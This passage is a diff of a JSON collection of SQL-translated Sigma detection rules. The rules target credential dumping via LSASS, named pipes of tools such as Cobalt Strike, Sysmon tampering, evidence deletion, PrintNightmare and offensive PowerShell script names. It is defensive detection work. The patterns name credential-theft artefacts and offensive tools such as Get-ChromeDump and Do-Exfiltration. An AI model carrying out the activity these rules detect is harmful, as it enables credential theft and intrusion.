'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\')" ], - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + "filename": "pipe_created_koh_default_pipe.yml" }, { - "title": "Disabling Windows Event Auditing", - "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "title": "Cred Dump-Tools Named Pipes", + "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "status": "test", - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", - "author": "@neu5ron", + "description": 
"Detects well-known credential dumping tools execution via specific named pipes", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tool for password recovery" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\')" ], - "filename": "win_security_disable_event_logging.yml" + "filename": "pipe_created_cred_dump_tools_named_pipes.yml" }, { - "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", - "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "title": "Sysmon Configuration Error", + "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", "status": "experimental", - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "author": "Bartlomiej Czyz, Relativity", + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP 
'^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" + "SELECT * FROM logs WHERE ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" ], - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + "filename": "sysmon_config_modification_error.yml" }, { - "title": "Suspicious LDAP-Attributes Used", - "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", - "status": "test", - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", - "author": "xknow @xknow_infosec", + "title": "Sysmon Blocked Executable", + "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "status": "experimental", + "description": "Triggers on any Sysmon file block executable event. 
Which should indicates a violation of the block policy set", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion" ], "falsepositives": [ - "Companies, who may use these default LDAP-Attributes for personal information" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" + "SELECT * FROM logs WHERE EventID = '27'" ], - "filename": "win_security_susp_ldap_dataexchange.yml" + "filename": "sysmon_file_block_exe.yml" }, { - "title": "Malicious Service Installations", - "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "status": "test", - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", - "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", + "title": "Sysmon Process Hollowing Detection", + "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "status": "experimental", + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1055.012" ], "falsepositives": [ - "Unknown" + "There are no known false positives at this time" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" + "SELECT * FROM logs WHERE (Type = 'Image is replaced' AND NOT ((NewProcessName LIKE '%:\\\\Program Files\\\\%' ESCAPE 
'\\' OR NewProcessName LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" ], - "filename": "win_security_mal_service_installs.yml" + "filename": "sysmon_process_hollowing.yml" }, { - "title": "AD Object WriteDAC Access", - "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "title": "Sysmon Configuration Modification", + "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", "status": "test", - "description": "Detects WRITE_DAC access to a domain object", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1564" ], "falsepositives": [ - "Unknown" + "Legitimate administrative action" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" + "SELECT * FROM logs WHERE ((State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" ], - "filename": "win_security_ad_object_writedac_access.yml" + "filename": "sysmon_config_modification_status.yml" }, { - "title": "Suspicious Teams Application Related ObjectAcess Event", - "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "title": "Prefetch File Deleted", + "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects the deletion of a prefetch file which may indicate an attempt 
to destroy forensic evidence", + "author": "Cedric MAURUGEON", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_teams_suspicious_objectaccess.yml" + "filename": "file_delete_win_delete_prefetch.yml" }, { - "title": "Metasploit SMB Authentication", - "id": "72124974-a68b-4366-b990-d30e0b2a190d", - "status": "test", - "description": "Alerts on Metasploit host's authentications on the domain.", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "title": "Potential PrintNightmare Exploitation Attempt", + "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "status": "experimental", + "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", + "author": "Bhabesh Raj", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Linux hostnames composed of 16 characters." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" ], - "filename": "win_security_metasploit_authentication.yml" + "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" }, { - "title": "Impacket PsExec Execution", - "id": "32d56ea1-417f-44ff-822b-882873f5f43b", - "status": "test", - "description": "Detects execution of Impacket's psexec.py.", - "author": "Bhabesh Raj", + "title": "Unusual File Deletion by Dns.exe", + "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "status": "experimental", + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_security_impacket_psexec.yml" + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" }, { - "title": "Password Protected ZIP File Opened (Suspicious Filenames)", 
- "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "title": "Exchange PowerShell Cmdlet History Deleted", + "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Possible FP during log rotation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" ], - "filename": "win_security_susp_opened_encrypted_zip_filename.yml" + "filename": "file_delete_win_delete_exchange_powershell_logs.yml" }, { - "title": "Password Protected ZIP File Opened (Email Attachment)", - "id": "571498c8-908e-40b4-910b-d2369159a3da", + "title": "Potential Persistence Via Outlook Form", + "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. 
See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a new Outlook form which can contain malicious code", + "author": "Tobias Michalski (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1137.003" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Legitimate use of outlook forms" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" ], - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + "filename": "file_event_win_office_outlook_newform.yml" }, { - "title": "LSASS Access from Non System Account", - "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", - "status": "experimental", - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "SafetyKatz Default Dump Filename", + "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "status": "test", + "description": "Detects default lsass dump filename from SafetyKatz", + "author": "Markus Neis", "tags": [ "attack.credential_access", "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate files with similar filename structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', 
'0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\'" ], - "filename": "win_security_lsass_access_non_system_account.yml" + "filename": "file_event_win_hktl_safetykatz.yml" }, { - "title": "Suspicious PsExec Execution", - "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", - "status": "test", - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "author": "Samir Bousseaden", + "title": "Suspicious Double Extension Files", + "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "status": "experimental", + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" + "SELECT * FROM logs 
WHERE (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\'))" ], - "filename": "win_security_susp_psexec.yml" + "filename": "file_event_win_susp_double_extension.yml" }, { - "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", - "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "title": "PCRE.NET Package Temp Files", + "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", "status": "test", - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. 
Possible Rubeus tries to get a handle to LSA.", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "description": "Detects processes creating temp files related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" ], - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + "filename": "file_event_win_pcre_net_temp_file.yml" }, { - "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", - "id": "8400629e-79a9-4737-b387-5db940ab2367", - "status": "test", - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", + "title": "LSASS Process Memory Dump Files", + "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "status": "experimental", + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\'))" ], - "filename": "win_security_rdp_bluekeep_poc_scanner.yml" + "filename": "file_event_win_lsass_dump.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", - "id": "8fe1c584-ee61-444b-be21-e9054b229694", - "status": "experimental", - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", - "author": "INIT_6", + "title": "Malicious PowerShell Scripts - FileCreation", + "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "status": "test", + "description": "Detects the creation of known offensive powershell scripts used for exploitation", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", "tags": [ "attack.execution", - "attack.t1569", - "cve.2021.1675", - "cve.2021.34527" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 
'%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AzureADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' 
OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR 
